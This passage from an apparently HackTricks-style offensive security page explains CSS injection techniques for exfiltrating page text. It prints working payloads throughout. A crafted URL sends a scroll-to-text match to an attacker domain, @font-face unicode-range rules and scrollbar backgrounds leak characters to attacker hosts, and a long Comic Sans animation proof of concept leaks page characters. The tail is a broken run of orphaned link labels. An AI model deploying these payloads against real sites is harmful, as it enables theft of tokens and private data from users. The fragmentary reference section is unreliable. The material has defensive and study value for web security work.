:target::before { content : url(target.png) }

In such scenarios, if the text "Administrator" is present on the page, the resource target.png gets requested from the server, indicating the text's presence. An instance of this attack can be executed through a specially crafted URL that embeds the injected CSS alongside a Scroll-to-text fragment:

http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator

Here, the attack manipulates HTML injection to transmit the CSS code, aiming at the specific text "Administrator" through the Scroll-to-text fragment (#:~:text=Administrator). If the text is found, the indicated resource is loaded, inadvertently signaling its presence to the attacker.

For mitigation, the following points should be noted:

  1. Constrained STTF Matching: Scroll-to-text Fragment (STTF) is designed to match only words or sentences, thereby limiting its capability to leak arbitrary secrets or tokens.

  2. Restriction to Top-level Browsing Contexts: STTF operates solely in top-level browsing contexts and does not function within iframes, making any exploitation attempt more noticeable to the user.

  3. Necessity of User Activation: STTF requires a user-activation gesture to operate, meaning exploitations are feasible only through user-initiated navigations. This requirement considerably mitigates the risk of attacks being automated without user interaction. Nevertheless, the blog post's author points out specific conditions and bypasses (e.g., social engineering, interaction with prevalent browser extensions) that might ease the attack's automation.

Awareness of these mechanisms and potential vulnerabilities is key for maintaining web security and safeguarding against such exploitative tactics.

@font-face / unicode-range

You can specify external fonts for specific unicode values that will only be gathered if those unicode values are present in the page. For example:

<style>
@font-face{
    font-family:poc;
    src: url(http://attacker.example.com/?A); /* fetched */
    unicode-range:U+0041;
}
@font-face{
    font-family:poc;
    src: url(http://attacker.example.com/?B); /* fetched too */
    unicode-range:U+0042;
}
@font-face{
    font-family:poc;
    src: url(http://attacker.example.com/?C); /* not fetched */
    unicode-range:U+0043;
}
#sensitive-information{
    font-family:poc;
}
</style>

<p id="sensitive-information">AB</p>htm

When you access this page, Chrome and Firefox fetch "?A" and "?B" because text node of sensitive-information contains "A" and "B" characters. But Chrome and Firefox do not fetch "?C" because it does not contain "C". This means that we have been able to read "A" and "B".

Text node exfiltration (I): ligatures

The technique described involves extracting text from a node by exploiting font ligatures and monitoring changes in width. The process involves several steps:

  1. Creation of Custom Fonts:

    • SVG fonts are crafted with glyphs having a horiz-adv-x attribute, which sets a large width for a glyph representing a two-character sequence.

    • Example SVG glyph: <glyph unicode="XY" horiz-adv-x="8000" d="M1 0z"/>, where "XY" denotes a two-character sequence.

    • These fonts are then converted to woff format using fontforge.

  2. Detection of Width Changes:

    • CSS is used to ensure that text does not wrap (white-space: nowrap) and to customize the scrollbar style.

    • The appearance of a horizontal scrollbar, styled distinctly, acts as an indicator (oracle) that a specific ligature, and hence a specific character sequence, is present in the text.

    • The CSS involved:

      body { white-space: nowrap }; 
      body::-webkit-scrollbar { background: blue; }
      body::-webkit-scrollbar:horizontal { background: url(http://attacker.com/?leak); }
  3. Exploit Process:

    • Step 1: Fonts are created for pairs of characters with substantial width.

    • Step 2: A scrollbar-based trick is employed to detect when the large width glyph (ligature for a character pair) is rendered, indicating the presence of the character sequence.

    • Step 3: Upon detecting a ligature, new glyphs representing three-character sequences are generated, incorporating the detected pair and adding a preceding or succeeding character.

    • Step 4: Detection of the three-character ligature is carried out.

    • Step 5: The process repeats, progressively revealing the entire text.

  4. Optimization:

    • The current initialization method using <meta refresh=... is not optimal.

    • A more efficient approach could involve the CSS @import trick, enhancing the exploit's performance.

Text node exfiltration (II): leaking the charset with a default font (not requiring external assets)

The concept revolves around utilizing an animation to incrementally expand a div's width, allowing one character at a time to transition from the 'suffix' part of the text to the 'prefix' part. This process effectively splits the text into two sections:

  1. Prefix: The initial line.

  2. Suffix: The subsequent line(s).

The transition stages of the characters would appear as follows:

C ADB

CA DB

CAD B

CADB

During this transition, the unicode-range trick is employed to identify each new character as it joins the prefix. This is achieved by switching the font to Comic Sans, which is notably taller than the default font, consequently triggering a vertical scrollbar. This scrollbar's appearance indirectly reveals the presence of a new character in the prefix.

Although this method allows the detection of unique characters as they appear, it does not specify which character is repeated, only that a repetition has occurred.

Basically, the unicode-range is used to detect a char, but as we don't want to load an external font, we need to find another way. When the char is found, it's given the pre-installed Comic Sans font, which makes the char bigger and triggers a scroll bar which will leak the found char.

Check the code extracted from the PoC:

/* comic sans is high (lol) and causes a vertical overflow */
@font-face{font-family:has_A;src:local('Comic Sans MS');unicode-range:U+41;font-style:monospace;}
@font-face{font-family:has_B;src:local('Comic Sans MS');unicode-range:U+42;font-style:monospace;}
@font-face{font-family:has_C;src:local('Comic Sans MS');unicode-range:U+43;font-style:monospace;}
@font-face{font-family:has_D;src:local('Comic Sans MS');unicode-range:U+44;font-style:monospace;}
@font-face{font-family:has_E;src:local('Comic Sans MS');unicode-range:U+45;font-style:monospace;}
@font-face{font-family:has_F;src:local('Comic Sans MS');unicode-range:U+46;font-style:monospace;}
@font-face{font-family:has_G;src:local('Comic Sans MS');unicode-range:U+47;font-style:monospace;}
@font-face{font-family:has_H;src:local('Comic Sans MS');unicode-range:U+48;font-style:monospace;}
@font-face{font-family:has_I;src:local('Comic Sans MS');unicode-range:U+49;font-style:monospace;}
@font-face{font-family:has_J;src:local('Comic Sans MS');unicode-range:U+4a;font-style:monospace;}
@font-face{font-family:has_K;src:local('Comic Sans MS');unicode-range:U+4b;font-style:monospace;}
@font-face{font-family:has_L;src:local('Comic Sans MS');unicode-range:U+4c;font-style:monospace;}
@font-face{font-family:has_M;src:local('Comic Sans MS');unicode-range:U+4d;font-style:monospace;}
@font-face{font-family:has_N;src:local('Comic Sans MS');unicode-range:U+4e;font-style:monospace;}
@font-face{font-family:has_O;src:local('Comic Sans MS');unicode-range:U+4f;font-style:monospace;}
@font-face{font-family:has_P;src:local('Comic Sans MS');unicode-range:U+50;font-style:monospace;}
@font-face{font-family:has_Q;src:local('Comic Sans MS');unicode-range:U+51;font-style:monospace;}
@font-face{font-family:has_R;src:local('Comic Sans MS');unicode-range:U+52;font-style:monospace;}
@font-face{font-family:has_S;src:local('Comic Sans MS');unicode-range:U+53;font-style:monospace;}
@font-face{font-family:has_T;src:local('Comic Sans MS');unicode-range:U+54;font-style:monospace;}
@font-face{font-family:has_U;src:local('Comic Sans MS');unicode-range:U+55;font-style:monospace;}
@font-face{font-family:has_V;src:local('Comic Sans MS');unicode-range:U+56;font-style:monospace;}
@font-face{font-family:has_W;src:local('Comic Sans MS');unicode-range:U+57;font-style:monospace;}
@font-face{font-family:has_X;src:local('Comic Sans MS');unicode-range:U+58;font-style:monospace;}
@font-face{font-family:has_Y;src:local('Comic Sans MS');unicode-range:U+59;font-style:monospace;}
@font-face{font-family:has_Z;src:local('Comic Sans MS');unicode-range:U+5a;font-style:monospace;}
@font-face{font-family:has_0;src:local('Comic Sans MS');unicode-range:U+30;font-style:monospace;}
@font-face{font-family:has_1;src:local('Comic Sans MS');unicode-range:U+31;font-style:monospace;}
@font-face{font-family:has_2;src:local('Comic Sans MS');unicode-range:U+32;font-style:monospace;}
@font-face{font-family:has_3;src:local('Comic Sans MS');unicode-range:U+33;font-style:monospace;}
@font-face{font-family:has_4;src:local('Comic Sans MS');unicode-range:U+34;font-style:monospace;}
@font-face{font-family:has_5;src:local('Comic Sans MS');unicode-range:U+35;font-style:monospace;}
@font-face{font-family:has_6;src:local('Comic Sans MS');unicode-range:U+36;font-style:monospace;}
@font-face{font-family:has_7;src:local('Comic Sans MS');unicode-range:U+37;font-style:monospace;}
@font-face{font-family:has_8;src:local('Comic Sans MS');unicode-range:U+38;font-style:monospace;}
@font-face{font-family:has_9;src:local('Comic Sans MS');unicode-range:U+39;font-style:monospace;}
@font-face{font-family:rest;src: local('Courier New');font-style:monospace;unicode-range:U+0-10FFFF}

div.leak {
    overflow-y: auto; /* leak channel */
    overflow-x: hidden; /* remove false positives */
    height: 40px; /* comic sans capitals exceed this height */
    font-size: 0px; /* make suffix invisible */
    letter-spacing: 0px; /* separation */
    word-break: break-all; /* small width split words in lines */
    font-family: rest; /* default */
    background: grey; /* default */
    width: 0px; /* initial value */
    animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
    animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
}

div.leak::first-line{
    font-size: 30px; /* prefix is visible in first line */
    text-transform: uppercase; /* only capital letters leak */
}

/* iterate over all chars */
@keyframes trychar {
    0% { font-family: rest; } /* delay for width change */
    5% { font-family: has_A, rest; --leak: url(?a); }
    6% { font-family: rest; }
    10% { font-family: has_B, rest; --leak: url(?b); }
    11% { font-family: rest; }
    15% { font-family: has_C, rest; --leak: url(?c); }
    16% { font-family: rest }
    20% { font-family: has_D, rest; --leak: url(?d); }
    21% { font-family: rest; }
    25% { font-family: has_E, rest; --leak: url(?e); }
    26% { font-family: rest; }
    30% { font-family: has_F, rest; --leak: url(?f); }
    31% { font-family: rest; }
    35% { font-family: has_G, rest; --leak: url(?g); }
    36% { font-family: rest; }
    40% { font-family: has_H, rest; --leak: url(?h); }
    41% { font-family: rest }
    45% { font-family: has_I, rest; --leak: url(?i); }
    46% { font-family: rest; }
    50% { font-family: has_J, rest; --leak: url(?j); }
    51% { font-family: rest; }
    55% { font-family: has_K, rest; --leak: url(?k); }
    56% { font-family: rest; }
    60% { font-family: has_L, rest; --leak: url(?l); }
    61% { font-family: rest; }
    65% { font-family: has_M, rest; --leak: url(?m); }
    66% { font-family: rest; }
    70% { font-family: has_N, rest; --leak: url(?n); }
    71% { font-family: rest; }
    75% { font-family: has_O, rest; --leak: url(?o); }
    76% { font-family: rest; }
    80% { font-family: has_P, rest; --leak: url(?p); }
    81% { font-family: rest; }
    85% { font-family: has_Q, rest; --leak: url(?q); }
    86% { font-family: rest; }
    90% { font-family: has_R, rest; --leak: url(?r); }
    91% { font-family: rest; }
    95% { font-family: has_S, rest; --leak: url(?s); }
    96% { font-family: rest; }
}

/* increase width char by char, i.e. add new char to prefix */
@keyframes loop {
    0% { width: 0px }
    1% { width: 20px }
    2% { width: 40px }
    3% { width: 60px }
    4% { width: 80px }
    4% { width: 100px }
    5% { width: 120px }
    6% { width: 140px }
    7% { width: 0px }
}

div::-webkit-scrollbar {
    background: blue;
}

/* side-channel */
div::-webkit-scrollbar:vertical {
    background: blue var(--leak);
}

Text node exfiltration (III): leaking the charset with a default font by hiding elements (not requiring external assets)

This case is very similar to the previous one, however, in this case the goal of making specific chars bigger than other is to hide something like a button to not be pressed by the bot or a image that won't be loaded. So we could measure the action (or lack of the action) and know if a specific char is present inside the text.

Text node exfiltration (III): leaking the charset by cache timing (not requiring external assets)

In this case, we could try to leak if a char is in the text by loading a fake font from the same origin:

@font-face {
  font-family: "A1";
  src: url(/static/bootstrap.min.css?q=1);
  unicode-range: U+0041;
}

If there is a match, the font will be loaded from /static/bootstrap.min.css?q=1. Although it won’t load successfully, the browser should cache it, and even if there is no cache, there is a 304 not modified mechanism, so the response should be faster than other things.

However, if the time difference of the cached response from the non-cached one isn't big enough, this won't be useful. For example, the author mentioned: However, after testing, I found that the first problem is that the speed is not much different, and the second problem is that the bot uses the disk-cache-size=1 flag, which is really thoughtful.

Text node exfiltration (III): leaking the charset by timing loading hundreds of local "fonts" (not requiring external assets)

In this case you can indicate CSS to load hundreds of fake fonts from the same origin when a match occurs. This way you can measure the time it takes and find out if a char appears or not with something like:

@font-face {
  font-family: "A1";
  src: url(/static/bootstrap.min.css?q=1), 
    url(/static/bootstrap.min.css?q=2),
    ....
    url(/static/bootstrap.min.css?q=500);
  unicode-range: U+0041;
}

And the bot’s code looks like this:

browser.get(url)
WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete')
time.sleep(30)

So, if the font does not match, the response time when visiting the bot is expected to be approximately 30 seconds. However, if there is a font match, multiple requests will be sent to retrieve the font, causing the network to have continuous activity. As a result, it will take longer to satisfy the stop condition and receive the response. Therefore, the response time can be used as an indicator to determine if there is a font match.

References

Support HackTricks

A practical example of exploiting this technique is detailed in the provided code snippet. You can view it .

As , it's possible to combine the selectors :has and :not to identify content even from blind elements. This is very useful when you have no idea what is inside the web page loading the CSS injection. It's also possible to use those selectors to extract information from several block of the same type like in:

Combining this with the following @import technique, it's possible to exfiltrate a lot of info using CSS injection from blind pages with .

This was first showed by and it works like this:

You can find the original or you can find almost the

:empty selector: Used for example in :

Reference: ,

The :target pseudo-class is employed to select an element targeted by a URL fragment, as specified in the . It's crucial to understand that ::target-text doesn't match any elements unless the text is explicitly targeted by the fragment.

For more information check the original report:

You can check an .

Reference:

Reference:

This trick was released in this . The charset used in a text node can be leaked using the default fonts installed in the browser: no external -or custom- fonts are needed.

Reference: This is mentioned as

Reference: This is mentioned as

Reference: This is mentioned as

Learn & practice AWS Hacking: Learn & practice GCP Hacking:

Check the !

Join the 💬 or the or follow us on Twitter 🐦 .

Share hacking tricks by submitting PRs to the and github repos.

🕸️
here
explained in this post
blind-css-exfiltration
Pepe Vila
this writeup
CSS based Attack: Abusing unicode-range of @font-face
Error-Based XS-Search PoC by @terjanq
CSS Selectors Level 4 specification
https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/
exploit using this technique for a CTF here
Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację
PoC using Comic Sans by @Cgvwzq & @Terjanq
Slackers thread
an unsuccessful solution in this writeup
an unsuccessful solution in this writeup
an unsuccessful solution in this writeup
https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e
https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b
https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d
https://x-c3ll.github.io/posts/CSS-Injection-Primitives/
subscription plans
Discord group
telegram group
@hacktricks_live
HackTricks
HackTricks Cloud
Pepe Vila's code to exploit this here
same code but commented here.
HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training GCP Red Team Expert (GRTE)
subscription plans
Discord group
telegram group
@hacktricks_live
HackTricks
HackTricks Cloud
HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training GCP Red Team Expert (GRTE)